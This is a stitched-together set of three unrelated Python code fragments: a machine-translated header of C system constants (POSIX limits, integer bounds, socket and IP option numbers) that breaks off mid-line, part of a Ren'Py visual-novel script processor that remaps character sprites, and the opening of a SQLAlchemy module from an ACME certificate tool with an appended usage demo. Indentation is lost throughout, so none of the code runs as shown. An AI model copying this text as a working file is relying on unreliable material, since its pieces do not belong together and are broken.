_POSIX_C_SOURCE = 2
_POSIX_C_SOURCE = 199506L
_POSIX_C_SOURCE = 200112L
_POSIX_C_SOURCE = 200809L
__USE_POSIX_IMPLICITLY = 1
__USE_POSIX = 1
__USE_POSIX2 = 1
__USE_POSIX199309 = 1
__USE_POSIX199506 = 1
__USE_XOPEN2K = 1
__USE_ISOC99 = 1
__USE_XOPEN2K8 = 1
_ATFILE_SOURCE = 1
__USE_XOPEN = 1
__USE_XOPEN_EXTENDED = 1
__USE_UNIX98 = 1
_LARGEFILE_SOURCE = 1
__USE_XOPEN2K8 = 1
__USE_XOPEN2K = 1
__USE_ISOC99 = 1
__USE_XOPEN_EXTENDED = 1
__USE_LARGEFILE = 1
__USE_LARGEFILE64 = 1
__USE_FILE_OFFSET64 = 1
__USE_MISC = 1
__USE_BSD = 1
__USE_SVID = 1
__USE_ATFILE = 1
__USE_GNU = 1
__USE_REENTRANT = 1
__USE_FORTIFY_LEVEL = 2
__USE_FORTIFY_LEVEL = 1
__USE_FORTIFY_LEVEL = 0
# Included from bits/predefs.h
__STDC_IEC_559__ = 1
__STDC_IEC_559_COMPLEX__ = 1
__STDC_ISO_10646__ = 200009L
__GNU_LIBRARY__ = 6
__GLIBC__ = 2
__GLIBC_MINOR__ = 11
__GLIBC_HAVE_LONG_LONG = 1
# Included from sys/cdefs.h
_SYS_CDEFS_H = 1
def __NTH(fct): return fct
def __NTH(fct): return fct
def __P(args): return args
def __PMT(args): return args
def __STRING(x): return #x
def __bos(ptr): return __builtin_object_size (ptr, __USE_FORTIFY_LEVEL > 1)
def __bos0(ptr): return __builtin_object_size (ptr, 0)
def __warnattr(msg): return __attribute__((__warning__ (msg)))
__flexarr = []
__flexarr = [0]
__flexarr = []
__flexarr = [1]
def __ASMNAME(cname): return __ASMNAME2 (__USER_LABEL_PREFIX__, cname)
def __attribute__(xyz): return
def __attribute_format_arg__(x): return __attribute__ ((__format_arg__ (x)))
def __attribute_format_arg__(x): return
# Included from bits/wordsize.h
__WORDSIZE = 32
__LDBL_COMPAT = 1
def __LDBL_REDIR_DECL(name): return \
__USE_LARGEFILE = 1
__USE_LARGEFILE64 = 1
__USE_EXTERN_INLINES = 1
__USE_EXTERN_INLINES_IN_LIBC = 1
# Included from gnu/stubs.h
# Included from stdint.h
_STDINT_H = 1
# Included from bits/wchar.h
_BITS_WCHAR_H = 1
__WCHAR_MAX = (2147483647)
__WCHAR_MIN = (-__WCHAR_MAX - 1)
def __INT64_C(c): return c ## L
def __UINT64_C(c): return c ## UL
def __INT64_C(c): return c ## LL
def __UINT64_C(c): return c ## ULL
INT8_MIN = (-128)
INT16_MIN = (-32767-1)
INT32_MIN = (-2147483647-1)
INT64_MIN = (-__INT64_C(9223372036854775807)-1)
INT8_MAX = (127)
INT16_MAX = (32767)
INT32_MAX = (2147483647)
INT64_MAX = (__INT64_C(9223372036854775807))
UINT8_MAX = (255)
UINT16_MAX = (65535)
UINT64_MAX = (__UINT64_C(18446744073709551615))
INT_LEAST8_MIN = (-128)
INT_LEAST16_MIN = (-32767-1)
INT_LEAST32_MIN = (-2147483647-1)
INT_LEAST64_MIN = (-__INT64_C(9223372036854775807)-1)
INT_LEAST8_MAX = (127)
INT_LEAST16_MAX = (32767)
INT_LEAST32_MAX = (2147483647)
INT_LEAST64_MAX = (__INT64_C(9223372036854775807))
UINT_LEAST8_MAX = (255)
UINT_LEAST16_MAX = (65535)
UINT_LEAST64_MAX = (__UINT64_C(18446744073709551615))
INT_FAST8_MIN = (-128)
INT_FAST16_MIN = (-9223372036854775807L-1)
INT_FAST32_MIN = (-9223372036854775807L-1)
INT_FAST16_MIN = (-2147483647-1)
INT_FAST32_MIN = (-2147483647-1)
INT_FAST64_MIN = (-__INT64_C(9223372036854775807)-1)
INT_FAST8_MAX = (127)
INT_FAST16_MAX = (9223372036854775807L)
INT_FAST32_MAX = (9223372036854775807L)
INT_FAST16_MAX = (2147483647)
INT_FAST32_MAX = (2147483647)
INT_FAST64_MAX = (__INT64_C(9223372036854775807))
UINT_FAST8_MAX = (255)
UINT_FAST64_MAX = (__UINT64_C(18446744073709551615))
INTPTR_MIN = (-9223372036854775807L-1)
INTPTR_MAX = (9223372036854775807L)
INTPTR_MIN = (-2147483647-1)
INTPTR_MAX = (2147483647)
INTMAX_MIN = (-__INT64_C(9223372036854775807)-1)
INTMAX_MAX = (__INT64_C(9223372036854775807))
UINTMAX_MAX = (__UINT64_C(18446744073709551615))
PTRDIFF_MIN = (-9223372036854775807L-1)
PTRDIFF_MAX = (9223372036854775807L)
PTRDIFF_MIN = (-2147483647-1)
PTRDIFF_MAX = (2147483647)
SIG_ATOMIC_MIN = (-2147483647-1)
SIG_ATOMIC_MAX = (2147483647)
WCHAR_MIN = __WCHAR_MIN
WCHAR_MAX = __WCHAR_MAX
def INT8_C(c): return c
def INT16_C(c): return c
def INT32_C(c): return c
def INT64_C(c): return c ## L
def INT64_C(c): return c ## LL
def UINT8_C(c): return c
def UINT16_C(c): return c
def UINT32_C(c): return c ## U
def UINT64_C(c): return c ## UL
def UINT64_C(c): return c ## ULL
def INTMAX_C(c): return c ## L
def UINTMAX_C(c): return c ## UL
def INTMAX_C(c): return c ## LL
def UINTMAX_C(c): return c ## ULL
# Included from sys/socket.h
_SYS_SOCKET_H = 1
# Included from sys/uio.h
_SYS_UIO_H = 1
from TYPES import *
# Included from bits/uio.h
_BITS_UIO_H = 1
from TYPES import *
UIO_MAXIOV = 1024
# Included from bits/sigset.h
_SIGSET_H_types = 1
_SIGSET_H_fns = 1
def __sigword(sig): return (((sig) - 1) >> 5)
def __sigemptyset(set): return \
def __sigfillset(set): return \
def __sigisemptyset(set): return \
# Included from bits/socket.h
__BITS_SOCKET_H = 1
# Included from limits.h
_LIBC_LIMITS_H_ = 1
MB_LEN_MAX = 16
_LIMITS_H = 1
CHAR_BIT = 8
SCHAR_MIN = (-128)
SCHAR_MAX = 127
UCHAR_MAX = 255
CHAR_MIN = 0
CHAR_MAX = UCHAR_MAX
CHAR_MIN = SCHAR_MIN
CHAR_MAX = SCHAR_MAX
SHRT_MIN = (-32768)
SHRT_MAX = 32767
USHRT_MAX = 65535
INT_MAX = 2147483647
LONG_MAX = 9223372036854775807L
LONG_MAX = 2147483647L
LONG_MIN = (-LONG_MAX - 1L)
# Included from bits/posix1_lim.h
_BITS_POSIX1_LIM_H = 1
_POSIX_AIO_LISTIO_MAX = 2
_POSIX_AIO_MAX = 1
_POSIX_ARG_MAX = 4096
_POSIX_CHILD_MAX = 25
_POSIX_CHILD_MAX = 6
_POSIX_DELAYTIMER_MAX = 32
_POSIX_HOST_NAME_MAX = 255
_POSIX_LINK_MAX = 8
_POSIX_LOGIN_NAME_MAX = 9
_POSIX_MAX_CANON = 255
_POSIX_MAX_INPUT = 255
_POSIX_MQ_OPEN_MAX = 8
_POSIX_MQ_PRIO_MAX = 32
_POSIX_NAME_MAX = 14
_POSIX_NGROUPS_MAX = 8
_POSIX_NGROUPS_MAX = 0
_POSIX_OPEN_MAX = 20
_POSIX_OPEN_MAX = 16
_POSIX_FD_SETSIZE = _POSIX_OPEN_MAX
_POSIX_PATH_MAX = 256
_POSIX_PIPE_BUF = 512
_POSIX_RE_DUP_MAX = 255
_POSIX_RTSIG_MAX = 8
_POSIX_SEM_NSEMS_MAX = 256
_POSIX_SEM_VALUE_MAX = 32767
_POSIX_SIGQUEUE_MAX = 32
_POSIX_SSIZE_MAX = 32767
_POSIX_STREAM_MAX = 8
_POSIX_SYMLINK_MAX = 255
_POSIX_SYMLOOP_MAX = 8
_POSIX_TIMER_MAX = 32
_POSIX_TTY_NAME_MAX = 9
_POSIX_TZNAME_MAX = 6
_POSIX_QLIMIT = 1
_POSIX_HIWAT = _POSIX_PIPE_BUF
_POSIX_UIO_MAXIOV = 16
_POSIX_CLOCKRES_MIN = 20000000
# Included from bits/local_lim.h
# Included from sys/syslimits.h
ARG_MAX = 262144
CHILD_MAX = 40
LINK_MAX = 32767
MAX_CANON = 255
MAX_INPUT = 255
NAME_MAX = 255
NGROUPS_MAX = 1023
OPEN_MAX = 64
PATH_MAX = 1024
PIPE_BUF = 512
IOV_MAX = 1024
_POSIX_THREAD_KEYS_MAX = 128
PTHREAD_KEYS_MAX = 1024
_POSIX_THREAD_DESTRUCTOR_ITERATIONS = 4
PTHREAD_DESTRUCTOR_ITERATIONS = _POSIX_THREAD_DESTRUCTOR_ITERATIONS
_POSIX_THREAD_THREADS_MAX = 64
PTHREAD_THREADS_MAX = 1024
AIO_PRIO_DELTA_MAX = 20
PTHREAD_STACK_MIN = 16384
TIMER_MAX = 256
DELAYTIMER_MAX = 2147483647
SSIZE_MAX = LONG_MAX
NGROUPS_MAX = 8
# Included from bits/posix2_lim.h
_BITS_POSIX2_LIM_H = 1
_POSIX2_BC_BASE_MAX = 99
_POSIX2_BC_DIM_MAX = 2048
_POSIX2_BC_SCALE_MAX = 99
_POSIX2_BC_STRING_MAX = 1000
_POSIX2_COLL_WEIGHTS_MAX = 2
_POSIX2_EXPR_NEST_MAX = 32
_POSIX2_LINE_MAX = 2048
_POSIX2_RE_DUP_MAX = 255
_POSIX2_CHARCLASS_NAME_MAX = 14
BC_BASE_MAX = _POSIX2_BC_BASE_MAX
BC_DIM_MAX = _POSIX2_BC_DIM_MAX
BC_SCALE_MAX = _POSIX2_BC_SCALE_MAX
BC_STRING_MAX = _POSIX2_BC_STRING_MAX
COLL_WEIGHTS_MAX = 255
EXPR_NEST_MAX = _POSIX2_EXPR_NEST_MAX
LINE_MAX = _POSIX2_LINE_MAX
CHARCLASS_NAME_MAX = 2048
RE_DUP_MAX = (0x7fff)
# Included from bits/xopen_lim.h
_XOPEN_LIM_H = 1
# Included from bits/stdio_lim.h
L_tmpnam = 20
TMP_MAX = 238328
FILENAME_MAX = 1024
L_ctermid = 9
L_cuserid = 9
FOPEN_MAX = 64
IOV_MAX = 1024
_XOPEN_IOV_MAX = _POSIX_UIO_MAXIOV
NL_ARGMAX = _POSIX_ARG_MAX
NL_LANGMAX = _POSIX2_LINE_MAX
NL_MSGMAX = INT_MAX
NL_NMAX = INT_MAX
NL_SETMAX = INT_MAX
NL_TEXTMAX = INT_MAX
NZERO = 20
WORD_BIT = 16
WORD_BIT = 32
WORD_BIT = 64
WORD_BIT = 16
WORD_BIT = 32
WORD_BIT = 64
WORD_BIT = 32
LONG_BIT = 32
LONG_BIT = 64
LONG_BIT = 32
LONG_BIT = 64
LONG_BIT = 64
LONG_BIT = 32
# Included from bits/types.h
_BITS_TYPES_H = 1
__S32_TYPE = int
__SWORD_TYPE = int
__SLONG32_TYPE = int
# Included from bits/typesizes.h
_BITS_TYPESIZES_H = 1
__PID_T_TYPE = __S32_TYPE
__CLOCK_T_TYPE = __S32_TYPE
__SWBLK_T_TYPE = __S32_TYPE
__CLOCKID_T_TYPE = __S32_TYPE
__TIMER_T_TYPE = __S32_TYPE
__SSIZE_T_TYPE = __SWORD_TYPE
__FD_SETSIZE = 1024
PF_UNSPEC = 0
PF_LOCAL = 1
PF_UNIX = PF_LOCAL
PF_FILE = PF_LOCAL
PF_INET = 2
PF_IMPLINK = 3
PF_PUP = 4
PF_CHAOS = 5
PF_NS = 6
PF_ISO = 7
PF_OSI = PF_ISO
PF_ECMA = 8
PF_DATAKIT = 9
PF_CCITT = 10
PF_SNA = 11
PF_DECnet = 12
PF_DLI = 13
PF_LAT = 14
PF_HYLINK = 15
PF_APPLETALK = 16
PF_ROUTE = 17
PF_LINK = 18
PF_XTP = 19
PF_COIP = 20
PF_CNT = 21
PF_RTIP = 22
PF_IPX = 23
PF_SIP = 24
PF_PIP = 25
PF_ISDN = 26
PF_KEY = 27
PF_INET6 = 28
PF_NATM = 29
PF_ATM = 30
PF_HDRCMPLT = 31
PF_NETGRAPH = 32
PF_MAX = 33
AF_UNSPEC = PF_UNSPEC
AF_LOCAL = PF_LOCAL
AF_UNIX = PF_UNIX
AF_FILE = PF_FILE
AF_INET = PF_INET
AF_IMPLINK = PF_IMPLINK
AF_PUP = PF_PUP
AF_CHAOS = PF_CHAOS
AF_NS = PF_NS
AF_ISO = PF_ISO
AF_OSI = PF_OSI
AF_ECMA = PF_ECMA
AF_DATAKIT = PF_DATAKIT
AF_CCITT = PF_CCITT
AF_SNA = PF_SNA
AF_DECnet = PF_DECnet
AF_DLI = PF_DLI
AF_LAT = PF_LAT
AF_HYLINK = PF_HYLINK
AF_APPLETALK = PF_APPLETALK
AF_ROUTE = PF_ROUTE
AF_LINK = PF_LINK
pseudo_AF_XTP = PF_XTP
AF_COIP = PF_COIP
AF_CNT = PF_CNT
pseudo_AF_RTIP = PF_RTIP
AF_IPX = PF_IPX
AF_SIP = PF_SIP
pseudo_AF_PIP = PF_PIP
AF_ISDN = PF_ISDN
AF_E164 = AF_ISDN
pseudo_AF_KEY = PF_KEY
AF_INET6 = PF_INET6
AF_NATM = PF_NATM
AF_ATM = PF_ATM
pseudo_AF_HDRCMPLT = PF_HDRCMPLT
AF_NETGRAPH = PF_NETGRAPH
AF_MAX = PF_MAX
SOMAXCONN = 128
# Included from bits/sockaddr.h
_BITS_SOCKADDR_H = 1
def __SOCKADDR_COMMON(sa_prefix): return \
_HAVE_SA_LEN = 1
_SS_SIZE = 128
def CMSG_FIRSTHDR(mhdr): return \
CMGROUP_MAX = 16
SOL_SOCKET = 0xffff
LOCAL_PEERCRED = 0x001
LOCAL_CREDS = 0x002
LOCAL_CONNWAIT = 0x004
# Included from bits/socket2.h
def IN_CLASSA(a): return ((((in_addr_t)(a)) & (-2147483648)) == 0)
IN_CLASSA_NET = (-16777216)
IN_CLASSA_NSHIFT = 24
IN_CLASSA_HOST = ((-1) & ~IN_CLASSA_NET)
IN_CLASSA_MAX = 128
def IN_CLASSB(a): return ((((in_addr_t)(a)) & (-1073741824)) == (-2147483648))
IN_CLASSB_NET = (-65536)
IN_CLASSB_NSHIFT = 16
IN_CLASSB_HOST = ((-1) & ~IN_CLASSB_NET)
IN_CLASSB_MAX = 65536
def IN_CLASSC(a): return ((((in_addr_t)(a)) & (-536870912)) == (-1073741824))
IN_CLASSC_NET = (-256)
IN_CLASSC_NSHIFT = 8
IN_CLASSC_HOST = ((-1) & ~IN_CLASSC_NET)
def IN_CLASSD(a): return ((((in_addr_t)(a)) & (-268435456)) == (-536870912))
def IN_MULTICAST(a): return IN_CLASSD(a)
def IN_EXPERIMENTAL(a): return ((((in_addr_t)(a)) & (-536870912)) == (-536870912))
def IN_BADCLASS(a): return ((((in_addr_t)(a)) & (-268435456)) == (-268435456))
IN_LOOPBACKNET = 127
INET_ADDRSTRLEN = 16
INET6_ADDRSTRLEN = 46
# Included from bits/in.h
IMPLINK_IP = 155
IMPLINK_LOWEXPER = 156
IMPLINK_HIGHEXPER = 158
IPPROTO_DIVERT = 258
SOL_IP = 0
IP_OPTIONS = 1
IP_HDRINCL = 2
IP_TOS = 3
IP_TTL = 4
IP_RECVOPTS = 5
IP_RECVRETOPTS = 6
IP_RECVDSTADDR = 7
IP_SENDSRCADDR = IP_RECVDSTADDR
IP_RETOPTS = 8
IP_MULTICAST_IF = 9
IP_MULTICAST_TTL = 10
IP_MULTICAST_LOOP = 11
IP_ADD_MEMBERSHIP = 12
IP_DROP_MEMBERSHIP = 13
IP_MULTICAST_VIF = 14
IP_RSVP_ON = 15
IP_RSVP_OFF = 16
IP_RSVP_VIF_ON = 17
IP_RSVP_VIF_OFF = 18
IP_PORTRANGE = 19
IP_RECVIF = 20
IP_IPSEC_POLICY = 21
IP_FAITH = 22
IP_ONESBCAST = 23
IP_NONLOCALOK = 24
IP_FW_TABLE_ADD = 40
IP_FW_TABLE_DEL = 41
IP_FW_TABLE_FLUSH = 42
IP_FW_TABLE_GETSIZE = 43
IP_FW_TABLE_LIST = 44
IP_FW_ADD = 50
IP_FW_DEL = 51
IP_FW_FLUSH = 52
IP_FW_ZERO = 53
IP_FW_GET = 54
IP_FW_RESETLOG = 55
IP_FW_NAT_CFG = 56
IP_FW_NAT_DEL = 57
IP_FW_NAT_GET_CONFIG = 58
IP_FW_NAT_GET_LOG = 59
IP_DUMMYNET_CONFIGURE = 60
IP_DUMMYNET_DEL = 61
IP_DUMMYNET_FLUSH = 62
IP_DUMMYNET_GET = 64
IP_RECVTTL = 65
IP_MINTTL = 66
IP_DONTFRAG = 67
IP_ADD_SOURCE_MEMBERSHIP = 70
IP_DROP_SOURCE_MEMBERSHIP = 71
IP_BLOCK_SOURCE = 72
IP_UNBLOCK_SOURCE = 73
IP_MSFILTER = 74
MCAST_JOIN_GROUP = 80
MCAST_LEAVE_GROUP = 81
MCAST_JOIN_SOURCE_GROUP = 82
MCAST_LEAVE_SOURCE_GROUP = 83
MCAST_BLOCK_SOURCE = 84
MCAST_UNBLOCK_SOURCE = 85
IP_DEFAULT_MULTICAST_TTL = 1
IP_DEFAULT_MULTICAST_LOOP = 1
IP_MIN_MEMBERSHIPS = 31
IP_MAX_MEMBERSHIPS = 4095
IP_MAX_SOURCE_FILTER = 1024
MCAST_UNDEFINED = 0
MCAST_INCLUDE = 1
MCAST_EXCLUDE = 2
IP_PORTRANGE_DEFAULT = 0
IP_PORTRANGE_HIGH = 1
IP_PORTRANGE_LOW = 2
IPCTL_FORWARDING = 1
IPCTL_SENDREDIRECTS = 2
IPCTL_DEFTTL = 3
IPCTL_DEFMTU = 4
IPCTL_RTEXPIRE = 5
IPCTL_RTMINEXPIRE = 6
IPCTL_RTMAXCACHE = 7
IPCTL_SOURCEROUTE = 8
IPCTL_DIRECTEDBROADCAST = 9
IPCTL_INTRQMAXLEN = 10
IPCTL_INTRQDROPS = 11
IPCTL_STATS = 12
IPCTL_ACCEPTSOURCEROUTE = 13
IPCTL_FASTFORWARDING = 14
IPCTL_KEEPFAITH = 15
IPCTL_GIF_TTL = 16
IPCTL_MAXID = 17
IPV6_SOCKOPT_RESERVED1 = 3
IPV6_UNICAST_HOPS = 4
IPV6_MULTICAST_IF = 9
IPV6_MULTICAST_HOPS = 10
IPV6_MULTICAST_LOOP = 11
IPV6_JOIN_GROUP = 12
IPV6_LEAVE_GROUP = 13
IPV6_PORTRANGE = 14
ICMP6_FILTER = 18
IPV6_CHECKSUM = 26
IPV6_V6ONLY = 27
IPV6_IPSEC_POLICY = 28
IPV6_FAITH = 29
IPV6_FW_ADD = 30
IPV6_FW_DEL = 31
IPV6_FW_FLUSH = 32
IPV6_FW_ZERO = 33
IPV6_FW_GET = 34
IPV6_RTHDRDSTOPTS = 35
IPV6_RECVPKTINFO = 36
IPV6_RECVHOPLIMIT = 37
IPV6_RECVRTHDR = 38
IPV6_RECVHOPOPTS = 39
IPV6_RECVDSTOPTS = 40
IPV6_USE_MIN_MTU = 42
IPV6_RECVPATHMTU = 43
IPV6_PATHMTU = 44
IPV6_PKTINFO = 46
IPV6_HOPLIMIT = 47
IPV6_NEXTHOP = 48
IPV6_HOPOPTS = 49
IPV6_DSTOPTS = 50
IPV6_RTHDR = 51
IPV6_RECVTCLASS = 57
IPV6_AUTOFLOWLABEL = 59
IPV6_TCLASS = | |
def processBlockStep(rpFile, thread):
#type: (rpp.RenPyFile, rpp.RenPyThread) -> None
blk = thread.stack[-1];
i = blk.lineNum;
indent = blk.indent;
if (not(rpFile.indentIsGood(i, indent))):
thread.stack.pop();
return;
strippedLine = rpFile.lines[i].strip();
if (strippedLine.startswith("menu:")):
# Shift the block processor to the end of the menu, so that when the
# thread gets cloned it resumes from the right place
blk.lineNum = rpFile.blockEndLine(i + 1, indent + 4);
processMenuStep(rpFile, thread, i);
return;
elif (strippedLine.startswith("return")):
thread.stack = []; # Kill the thread
return;
elif (strippedLine.startswith("if ")):
thread.stack.append(rpp.RenPyIf(i, indent)); # Add an IF processor to the stack
i = rpFile.blockEndLine(i + 1, indent + 4);
elif (strippedLine.startswith("elif ") or strippedLine.startswith("else:")):
i = rpFile.blockEndLine(i + 1, indent + 4); # Flush it
elif (strippedLine.startswith("label goopy")):
# We hit the goopy path, no need to process this
thread.stack = []; # Kill the thread
return;
elif (strippedLine.startswith("hide")):
person = strippedLine.split()[1];
if rpFile.trackVis and not(person == "bg"):
thread.vars["_visible_" + person] = "0";
i += 1;
elif (strippedLine.startswith("jump")):
label = strippedLine.split()[1];
if not(label in rpFile.labelList):
print("External jump: " + label);
thread.stack = []; # Kill this thread, it jumped out of the file
return;
jumpDest = rpFile.labelList[label];
if (not((label == "kpathendroundup2") or label.startswith("endingclone")) or (jumpDest > blk.lineNum)):
addLabelCall(rpFile, label, thread);
thread.stack = []; # Kill this thread, it jumped
return;
else:
i = i + 1;
elif (strippedLine.startswith("show") or strippedLine.startswith("scene")):
if rpFile.trackVis and strippedLine.startswith("scene"):
for varName in thread.vars:
if varName.startswith("_visible_"):
thread.vars[varName] = "0";
if not(rpFile.lineModifiedFlags[i]):
rpFile.lines[i] = processShow(rpFile, thread, i);
rpFile.lineModifiedFlags[i] = True;
i = i + 1;
elif (strippedLine.startswith("$")):
processCommand(rpFile, thread, i, strippedLine.strip('$').strip());
i = i + 1;
else:
i = i + 1;
blk.lineNum = i;
#-----------------------------------------------------------------------------
# On entry, lineNum points to the menu: line
def processMenuStep(rpFile, thread, lineNum):
#type: (rpp.RenPyFile, rpp.RenPyThread, int) -> None
global threads;
indent = getIndentOf(rpFile.lines[lineNum]) + 4;
lineNum = lineNum + 1;
# Iterate the whole menu and fork threads from the current one for each
# menu option
line = rpFile.lines[lineNum];
while((lineNum < rpFile.numLines) and rpFile.indentIsGood(lineNum, indent)):
if (getIndentOf(line) == indent):
menuItem = line.strip('\n').strip('\r').strip();
if not((menuItem[0] == '#') or menuItem.startswith("\"{s}")):
endQuote = menuItem.find("\"", 1);
condition = ":";
if (endQuote > 0):
condition = menuItem[endQuote + 1:].strip();
res = True;
if (not(condition == ":")):
# Menu has a condition on it
condition = condition.strip(':');
res = calculateCondition(thread, lineNum, condition.split());
if (res):
newThread = copy.deepcopy(thread);
newThread.stack.append(rpp.RenPyBlock(lineNum + 1, indent + 4));
threads.append(newThread);
lineNum = rpFile.blockEndLine(lineNum + 1, indent + 4);
else:
lineNum = lineNum + 1;
else:
lineNum = lineNum + 1;
line = rpFile.lines[lineNum];
# Kill the current thread. Because it's been used as the parent thread for
# all the menu options, it's not needed any more as each menu option will
# continue from here.
thread.stack = [];
#-----------------------------------------------------------------------------
def processShow(rpFile, thread, lineNum):
#type: (rpp.RenPyFile, rpp.RenPyThread, int) -> str
line = rpFile.lines[lineNum];
fields = line.strip().strip(":").split();
# At this point, 'fields' looks like this:
# ['show', 'maind', '17', 'with', 'dissolve']
# Check for backgrounds
if fields[1] == "bg":
if len(fields) < 3:
return line;
if not(fields[2] in rpFile.backMap):
#return flagError(rpFile, lineNum, "Background " + fields[2] + " has no mapping table entry");
return line;
newLine = "";
indent = 0;
while line[indent] == " ":
newLine += " ";
indent = indent + 1;
newbg = rpFile.backMap[fields[2]];
if (newbg == ""):
return flagError(rpFile, lineNum, "Background '" + fields[2] + "' exists but has no mapping");
newLine += fields[0] + " bg " + newbg;
i = 3;
while i < len(fields):
newLine += " " + fields[i];
i = i + 1;
if (line.strip()[-1] == ":"):
newLine += ":";
newLine += "\n";
return newLine;
# Check for 0.3 style "show cg" statements
if (fields[0] == "show") and (fields[1] == "cg"):
return rpFile.processCG(line);
# Try for a character
# Character label is fields[1], get character name
if not(fields[0] == "show"):
return line;
if not(fields[1] in characterLabelMap):
return line;
if not(lineNum in rpFile.showLines):
rpFile.showLines.append(lineNum);
if (rpFile.trackVis):
varName = "_visible_" + fields[1];
if not(varName in thread.vars) or (thread.vars[varName] == "0"):
# Person has become visible
if (fields[1] in rpFile.charFlip) and not(lineNum in rpFile.visLines):
rpFile.visLines.append(lineNum);
thread.vars[varName] = "1";
# If it's got no parameters, like "show michelled:", then just return it
# as there's no mapping to do
if (len(fields) < 3):
return line;
charName = characterLabelMap[fields[1]];
swappedCharName = charName;
if characterDoRemap[fields[1]]:
# Character is not a ghost, do the remap
if (charName in personDispVars):
swappedCharName = thread.vars[personDispVars[charName]];
swappedFields = swappedCharName.split();
swappedCharName = swappedFields[0];
#i = 1;
#while i < len(swappedFields):
# fields.append(swappedFields[i]);
# i = i + 1;
filenameMode = True;
baseMode = True;
exFile = swappedCharName + "_ex";
modifiers = "";
base = "";
i = 2;
while i < len(fields):
if (fields[i] in ["as", "at", "behind", "with", "zorder"]):
filenameMode = False;
if (filenameMode):
field = expandNumberField(fields[i]);
if (field == "full"):
exFile = exFile + "_full";
elif isNumberField(field):
baseMode = False;
if baseMode:
if not(field == "full") and not((charName == "hillary") and (fields[i] == "school")):
base = base + " " + fields[i];
else:
exFile = exFile + "_" + field;
else:
modifiers = modifiers + " " + fields[i];
i = i + 1;
if (exFile == (swappedCharName + "_ex")):
# It's something like "show candice with dissolve", with no fields so nothing to do
return line;
mappedFile = "";
hasMapped = False;
if (swappedCharName in rpFile.charMap):
if exFile in rpFile.charMap[swappedCharName]:
mappedFile = rpFile.charMap[swappedCharName][exFile];
hasMapped = True;
elif exFile+"_001" in rpFile.charMap[swappedCharName]:
mappedFile = rpFile.charMap[swappedCharName][exFile+"_001"];
hasMapped = True;
elif exFile+"_002" in rpFile.charMap[swappedCharName]:
mappedFile = rpFile.charMap[swappedCharName][exFile+"_002"];
hasMapped = True;
elif exFile+"_003" in rpFile.charMap[swappedCharName]:
mappedFile = rpFile.charMap[swappedCharName][exFile+"_003"];
hasMapped = True;
else:
# We're not doing a V3 or V4 mapping for this character, fake that we've done one
mappedFile = exFile;
hasMapped = True;
if not(hasMapped):
# The .rpy file is referencing a graphic that doesn't seem to exist in the 0.4 graphics directory.
print("DBG: Vars are: " + str(thread.vars));
return(flagError(rpFile, lineNum, "Mapping failed, source file '" + exFile + "' not found. Line being processed is: " + str(fields)));
if mappedFile == "":
return(flagError(rpFile, lineNum, "Mapping failed, source file '" + exFile + "' exists but has no mapping. Line being processed is: " + str(fields)));
# Map V6 if present
if (swappedCharName in rpFile.v6Map):
hasMapped = False;
v6File = "";
if mappedFile in rpFile.v6Map[swappedCharName]:
v6File = rpFile.v6Map[swappedCharName][mappedFile];
hasMapped = True;
elif mappedFile+"_001" in rpFile.v6Map[swappedCharName]:
v6File = rpFile.v6Map[swappedCharName][mappedFile+"_001"];
hasMapped = True;
elif mappedFile+"_002" in rpFile.v6Map[swappedCharName]:
v6File = rpFile.v6Map[swappedCharName][mappedFile+"_002"];
hasMapped = True;
elif mappedFile+"_003" in rpFile.v6Map[swappedCharName]:
v6File = rpFile.v6Map[swappedCharName][mappedFile+"_003"];
hasMapped = True;
if not(hasMapped):
return(flagError(rpFile, lineNum, "No V6 mapping for V5 file '" + mappedFile + "', source file '" + exFile + "', char name " + swappedCharName + ", original char " + charName));
#print("Mapped V5 " + mappedFile + " to V6 " + v6File);
mappedFile = v6File;
mappedFields = mappedFile.split("_");
if (len(mappedFields) < 2):
return(flagError(rpFile, lineNum, "Invalid mapping! Source is '" + exFile + "', map is '" + mappedFile + "'"));
if not(mappedFields[0] == swappedCharName):
return(flagError(rpFile, lineNum, "Mapped to a different character! Source is '" + exFile + "', map is '" + mappedFile + "'"));
if not(mappedFields[1] == "ex"):
return(flagError(rpFile, lineNum, "Mapping is not to an expression graphic! Source is '" + exFile + "', map is '" + mappedFile + "'"));
newLine = "";
indent = 0;
while line[indent] == " ":
newLine += " ";
indent = indent + 1;
newLine += "show " + fields[1] + base;
i = 2;
while i < len(mappedFields) - 1:
if isNumberField(mappedFields[i]):
newLine += " " + str(int(mappedFields[i]));
else:
newLine += " " + mappedFields[i];
i = i + 1;
newLine += modifiers;
if (line.strip()[-1] == ":"):
newLine += ":";
newLine += "\n";
return newLine;
#-----------------------------------------------------------------------------
def processNextThread(rpFile):
#type: (rpp.RenPyFile) -> None
global threads;
thread = threads.pop();
while len(thread.stack) > 0:
obj = thread.stack[-1];
if (obj.objType == "Block"):
processBlockStep(rpFile, thread);
elif (obj.objType | |
# stdlib
import logging
# pypi
import requests
import sqlalchemy
# from zope.sqlalchemy import mark_changed
# localapp
from . import actions_acme
from . import getcreate
from . import update
from .logger import _log_object_event
from .logger import log__OperationsEvent
from .. import errors
from .. import events
from ... import lib
from ...model import objects as model_objects
from ...model import utils as model_utils
# from .logger import AcmeLogger
# ==============================================================================
log = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
"""
TODO: sqlalchemy 1.4 rename
* ``isnot`` is now ``is_not``
* ``notin_`` is now ``not_in``
"""
_SA_VERSION = None # parsed version
_SA_1_4 = None # Boolean
def scalar_subquery(query):
global _SA_VERSION
global _SA_1_4
if _SA_VERSION is None:
_SA_VERSION = tuple(int(i) for i in sqlalchemy.__version__.split("."))
if _SA_VERSION >= (1, 4, 0):
_SA_1_4 = True
else:
_SA_1_4 = False
if _SA_1_4:
return query.scalar_subquery()
return query.subquery().as_scalar()
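# --- hedged usage sketch (not from the original module) ---
# Demonstrates the scalar_subquery() shim with a throwaway in-memory SQLite
# database. The `Widget` model is hypothetical and exists only for this
# example; assumes SQLAlchemy < 2.0, matching the 1.3/1.4 compatibility
# logic above.
def _demo_scalar_subquery():
    import sqlalchemy as sa
    from sqlalchemy.ext.declarative import declarative_base
    from sqlalchemy.orm import sessionmaker

    Base = declarative_base()

    class Widget(Base):
        __tablename__ = "widget"
        id = sa.Column(sa.Integer, primary_key=True)
        size = sa.Column(sa.Integer)

    engine = sa.create_engine("sqlite://")
    Base.metadata.create_all(engine)
    session = sessionmaker(bind=engine)()
    session.add_all([Widget(size=n) for n in (1, 2, 3)])
    session.flush()

    # the shim picks .scalar_subquery() or .subquery().as_scalar()
    # depending on the installed SQLAlchemy version
    biggest = scalar_subquery(session.query(sa.func.max(Widget.size)))
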